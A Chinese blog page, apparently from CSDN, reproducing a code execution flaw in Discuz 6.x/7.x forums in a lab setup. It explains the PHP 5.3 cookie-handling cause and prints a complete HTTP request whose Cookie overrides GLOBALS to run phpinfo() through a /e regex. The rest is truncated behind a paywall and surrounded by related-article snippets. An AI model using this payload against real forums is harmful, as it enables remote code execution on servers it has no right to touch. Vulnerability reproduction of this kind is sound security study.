Discuz 7.x/6.x 代码执行

最新推荐文章于 2022-09-15 11:20:16 发布
最新推荐文章于 2022-09-15 11:20:16 发布
阅读量477 收藏
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/99101108
版权
本文介绍了Discuz 7.x/6.x版本中,由于PHP 5.3.x的配置默认设置,允许通过Cookie覆盖全局变量,从而导致的代码执行漏洞。作者详细展示了漏洞复现的过程,包括如何利用此漏洞执行phpinfo()函数,并给出了获取shell的payload。
摘要由CSDN通过智能技术生成

Discuz 7.x/6.x 全局变量防御绕过导致代码执行

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

漏洞复现

安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Connection: close

可见,phpinfo已成功执行:

最低0.47元/天 解锁文章
haha13l4
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
discuz 3.x function_debug文件
12-15
这些函数帮助开发者追踪代码执行的流程,识别效率低下的部分,以及定位可能导致错误的源代码行。例如,`show_error`函数用于显示错误信息,`write_log`函数则负责将调试信息写入日志文件,便于后期分析。 当开启...
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
qq_41048303的博客
12-05 2353
1.漏洞原理 ​ 由于php5.3 x版本里php.ini的设置request_order默认值为GP,导致Discuz 6.x/7.x全局变量防御绕过漏洞。 2.漏洞环境 ​ 执行docker-compose up -d 启动后,访问http://192.168.254.202:8080/install来安装discuz ​ 数据库地址db,数据库名为discuz,数据库账号密码均为root 3.漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCA
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1109
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
vulfocus——discuz命令执行(wooyun-2010-080723)
最新发布
m0_62063669的博客
09-15 1346
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
Discuz x3.x模板 迪恩资讯媒体博客课程 商业版 GBK+UTF.zip
12-03
2. **代码优化**:避免冗余代码,提高模板的执行效率,提升用户体验。 3. **安全防护**:定期更新模板,修补潜在的安全漏洞,保障网站的稳定运行。 4. **自定义扩展**:根据业务需求,利用Discuz! 的插件和模块功能...
基于Discuz security.inc.php代码的深入分析
10-27
接下来,代码中定义了`IN_DISCUZ`常量,如果没有定义该常量,则程序会立即退出执行,并显示“Access Denied”提示,这防止了未授权的直接访问。 ```php if(!defined('IN_DISCUZ')){ exit('Access Denied'); } ``` ...
discuz 3.x function_debug
12-14
3. **性能分析**:在`function_debug`中,有一些函数用于计算和分析代码执行的时间,比如`DEBUG_START`和`DEBUG_END`,它们可以帮助开发者测量代码段的运行时间,从而找出可能导致性能下降的慢速操作。 4. **SQL...
Discuz_X3.1_SC_GBK.zip
03-18
《深入解析Discuz! X3.1 SC_GBK系统架构与功能实现》 Discuz! X3.1 SC_GBK是一款基于PHP语言和MySQL数据库的社区论坛系统,专为中国市场设计,采用简体中文(GBK)编码,为中文用户提供稳定且功能丰富的交流平台。...
php7全局变量漏洞,Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
weixin_42361708的博客
03-12 321
漏洞概述:由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。漏洞分析:include/global.func.php代码里:functiondaddslashes($string,$force=0){!defined('MAGIC_QUOTES_GPC')&&define(...
Discuz 7.x、6.x 全局变量防御绕过导致代码执行
浅笑996的博客
11-25 1162
0x01 分析 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 具体原理请参考: https://www.secpulse.com/archives/2338.html 0x02 环境...
Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现(超级详细)
weixin_45819911的博客
07-15 766
Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现 闲谈: 其实自己做个不少漏洞复现,但是一直没好意思发,后来我发现了,不发出来我写他干嘛?(反正也没人看) 0x00 漏洞概述: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 0x01 前置条件: php版本:php5.3.x
全局变量防御绕过漏洞演示
Chenamao的博客
08-09 487
目录 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub Docker简介: 搭建步骤: 让我们漏洞复现一下子: 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub 一款基于docker和docker-compose的漏洞环境部署平台。 vulhub官网地址:https://vulhub.org Docker简介: 是一个开源的应用容器引擎,基于Go语言并遵从Apache2.0协议开源。 可以让开发者打包到他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linu
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723)
黑白的博客
12-06 538
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
discuz论坛开启报错调试方法
会飞的鱼的博客
05-24 6053
Discuz论坛版本号:X 3 通常情况下,discuz自动将PHP自带的报错功能屏蔽掉,使得在实际开发中,看不到发生在程序上的语法错误。 比如: echo 1复制代码 以上代码在结尾少了个分号,通常会发出一个语法错误的提示,但是在Discuz系统中默认是屏蔽的,遇到这样的错误是无法判断错误发生在哪里 介个时候就很郁闷了,肿么办,肿么办,肿么办? 经过仔细研究源代码,发现了解决的办法: 1.con...
Discuz全局变量防御绕过导致代码执行getshell
ADummy的博客
02-05 585
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 by ADummy 0x00利用路线 ​ Discuz任意帖子页面—>cookie注入命令—>命令执行(phpinfo()或eval一句话)—>getshell 0x01漏洞介绍 ​ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞 ​ 影响版本 Dis
LNMP环境下安装Discuz_X2.5详细步骤
通过`tar`命令解压缩libiconv的源代码,进入解压后的目录,运行`configure`指定安装路径,之后执行`make`和`make install`完成安装。类似地,依次安装libmcrypt、mhash和mcrypt。libmcrypt是加密库,mhash提供多种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值